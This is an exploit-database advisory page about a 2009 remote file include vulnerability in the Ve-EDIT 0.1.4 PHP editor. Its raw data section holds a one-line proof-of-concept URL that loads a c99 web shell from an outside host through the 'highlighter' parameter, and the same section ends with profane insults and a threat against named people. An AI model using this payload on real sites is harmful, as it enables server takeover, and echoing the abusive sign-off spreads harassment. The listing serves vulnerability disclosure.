header-logo
Suggest Exploit
vendor:
Ve-EDIT
by:
RoMaNcYxHaCkEr
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Ve-EDIT
Affected Version From: 0.1.4
Affected Version To: 0.1.4
Patch Exists: YES
Related CWE: N/A
CPE: a:phpwebeditor:ve-edit
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Ve-EDIT v 0.1.4 Remote File Include Vulne

A vulnerability in Ve-EDIT v 0.1.4 allows remote attackers to include and execute arbitrary local files via a URL in the highlighter parameter to edit_htmlarea.php.

Mitigation:

Contact the vendor for a patch.
Source

Exploit-DB raw data:

   ====================================================
   | Ve-EDIT v 0.1.4 Remote File Include Vulne 
   |     My Home Page : WwW.Sec-Code.CoM
   |        Founded By RoMaNcYxHaCkEr           
   ====================================================
 
[!] Discovered.:                        RoMaNcYxHaCkEr
[!] Vendor.....:                          http://sourceforge.net/projects/phpwebeditor/
[!] My Homepage...:                 WwW.Sec-Code.CoM
[!] Security - Codes Group ...:  mr-al7rbi , sniper-code
[!] Contact Me ...:                     rXh@Mail.Net.Sa
 
[!] PoC........:
 
http://WwW.Sec-Code.CoM/vedit/editor/edit_htmlarea.php?highlighter=http://WwW.Sec-Code.CoM/c99.txt?
 
[!] Solution...:     Contact With Me ;)
 
[!] Greetingz..:    All My Forum Members , My TeaM , أبو عذاب , Dexter Franklin ;)
 
[!] Thx .. :            CoBRa_21 For His Found
 
[!] Fuck To .. :      Third , Dev1l-Fucker , sarbot511 <<< They Big Big Big Big Lamerz
 
[!] Note :             Watch Out Your Back , Before I Kick Your Ass Asshole :)
 
[!] rXh
 
[!] bEST wISHES

# milw0rm.com [2009-09-02]